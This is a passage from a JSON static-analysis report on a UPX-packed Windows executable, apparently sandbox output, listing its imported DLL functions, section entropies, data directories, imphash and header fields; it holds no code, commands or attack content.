2495. {
2496. "name": "RegCloseKey",
2497. "address": "0xa9e154"
2498. }
2499. ],
2500. "dll": "ADVAPI32.dll"
2501. },
2502. {
2503. "imports": [
2504. {
2505. "name": null,
2506. "address": "0xa9e15c"
2507. }
2508. ],
2509. "dll": "COMCTL32.dll"
2510. },
2511. {
2512. "imports": [
2513. {
2514. "name": "ChooseColorA",
2515. "address": "0xa9e164"
2516. }
2517. ],
2518. "dll": "comdlg32.dll"
2519. },
2520. {
2521. "imports": [
2522. {
2523. "name": "Escape",
2524. "address": "0xa9e16c"
2525. }
2526. ],
2527. "dll": "GDI32.dll"
2528. },
2529. {
2530. "imports": [
2531. {
2532. "name": "GetAdaptersInfo",
2533. "address": "0xa9e174"
2534. }
2535. ],
2536. "dll": "iphlpapi.dll"
2537. },
2538. {
2539. "imports": [
2540. {
2541. "name": "LoadLibraryA",
2542. "address": "0xa9e17c"
2543. },
2544. {
2545. "name": "ExitProcess",
2546. "address": "0xa9e180"
2547. },
2548. {
2549. "name": "GetProcAddress",
2550. "address": "0xa9e184"
2551. },
2552. {
2553. "name": "VirtualProtect",
2554. "address": "0xa9e188"
2555. }
2556. ],
2557. "dll": "KERNEL32.DLL"
2558. },
2559. {
2560. "imports": [
2561. {
2562. "name": "OleRun",
2563. "address": "0xa9e190"
2564. }
2565. ],
2566. "dll": "ole32.dll"
2567. },
2568. {
2569. "imports": [
2570. {
2571. "name": "VariantCopy",
2572. "address": "0xa9e198"
2573. }
2574. ],
2575. "dll": "OLEAUT32.dll"
2576. },
2577. {
2578. "imports": [
2579. {
2580. "name": "RasHangUpA",
2581. "address": "0xa9e1a0"
2582. }
2583. ],
2584. "dll": "RASAPI32.dll"
2585. },
2586. {
2587. "imports": [
2588. {
2589. "name": "ShellExecuteA",
2590. "address": "0xa9e1a8"
2591. }
2592. ],
2593. "dll": "SHELL32.dll"
2594. },
2595. {
2596. "imports": [
2597. {
2598. "name": "GetDC",
2599. "address": "0xa9e1b0"
2600. }
2601. ],
2602. "dll": "USER32.dll"
2603. },
2604. {
2605. "imports": [
2606. {
2607. "name": "VerQueryValueA",
2608. "address": "0xa9e1b8"
2609. }
2610. ],
2611. "dll": "VERSION.dll"
2612. },
2613. {
2614. "imports": [
2615. {
2616. "name": "InternetOpenA",
2617. "address": "0xa9e1c0"
2618. }
2619. ],
2620. "dll": "WININET.dll"
2621. },
2622. {
2623. "imports": [
2624. {
2625. "name": "waveOutOpen",
2626. "address": "0xa9e1c8"
2627. }
2628. ],
2629. "dll": "WINMM.dll"
2630. },
2631. {
2632. "imports": [
2633. {
2634. "name": "OpenPrinterA",
2635. "address": "0xa9e1d0"
2636. }
2637. ],
2638. "dll": "WINSPOOL.DRV"
2639. },
2640. {
2641. "imports": [
2642. {
2643. "name": "recvfrom",
2644. "address": "0xa9e1d8"
2645. }
2646. ],
2647. "dll": "WS2_32.dll"
2648. }
2649. ],
2650. "digital_signers": null,
2651. "exported_dll_name": null,
2652. "actual_checksum": "0x00539452",
2653. "overlay": null,
2654. "imagebase": "0x00400000",
2655. "reported_checksum": "0x00000000",
2656. "icon_hash": null,
2657. "entrypoint": "0x00a9d5b0",
2658. "timestamp": "2019-06-24 19:13:25",
2659. "osversion": "4.0",
2660. "sections": [
2661. {
2662. "name": "UPX0",
2663. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2664. "virtual_address": "0x00001000",
2665. "size_of_data": "0x00000000",
2666. "entropy": "0.00",
2667. "raw_address": "0x00000400",
2668. "virtual_size": "0x00170000",
2669. "characteristics_raw": "0xe0000080"
2670. },
2671. {
2672. "name": "UPX1",
2673. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2674. "virtual_address": "0x00171000",
2675. "size_of_data": "0x0052c800",
2676. "entropy": "7.82",
2677. "raw_address": "0x00000400",
2678. "virtual_size": "0x0052d000",
2679. "characteristics_raw": "0xe0000040"
2680. },
2681. {
2682. "name": "UPX2",
2683. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2684. "virtual_address": "0x0069e000",
2685. "size_of_data": "0x00000400",
2686. "entropy": "3.70",
2687. "raw_address": "0x0052cc00",
2688. "virtual_size": "0x00001000",
2689. "characteristics_raw": "0xc0000040"
2690. }
2691. ],
2692. "resources": [],
2693. "dirents": [
2694. {
2695. "virtual_address": "0x00000000",
2696. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2697. "size": "0x00000000"
2698. },
2699. {
2700. "virtual_address": "0x0069e000",
2701. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2702. "size": "0x0000037c"
2703. },
2704. {
2705. "virtual_address": "0x00000000",
2706. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2707. "size": "0x00000000"
2708. },
2709. {
2710. "virtual_address": "0x00000000",
2711. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2712. "size": "0x00000000"
2713. },
2714. {
2715. "virtual_address": "0x00000000",
2716. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2717. "size": "0x00000000"
2718. },
2719. {
2720. "virtual_address": "0x00000000",
2721. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2722. "size": "0x00000000"
2723. },
2724. {
2725. "virtual_address": "0x00000000",
2726. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2727. "size": "0x00000000"
2728. },
2729. {
2730. "virtual_address": "0x00000000",
2731. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2732. "size": "0x00000000"
2733. },
2734. {
2735. "virtual_address": "0x00000000",
2736. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2737. "size": "0x00000000"
2738. },
2739. {
2740. "virtual_address": "0x00000000",
2741. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2742. "size": "0x00000000"
2743. },
2744. {
2745. "virtual_address": "0x00000000",
2746. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2747. "size": "0x00000000"
2748. },
2749. {
2750. "virtual_address": "0x00000000",
2751. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2752. "size": "0x00000000"
2753. },
2754. {
2755. "virtual_address": "0x00000000",
2756. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2757. "size": "0x00000000"
2758. },
2759. {
2760. "virtual_address": "0x00000000",
2761. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2762. "size": "0x00000000"
2763. },
2764. {
2765. "virtual_address": "0x00000000",
2766. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2767. "size": "0x00000000"
2768. },
2769. {
2770. "virtual_address": "0x00000000",
2771. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2772. "size": "0x00000000"
2773. }
2774. ],
2775. "exports": [],
2776. "guest_signers": {},
2777. "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
2778. "icon_fuzzy": null,
2779. "icon": null,
2780. "pdbpath": null,
2781. "imported_dll_count": 16,
2782. "versioninfo": []
2783. }
2784. }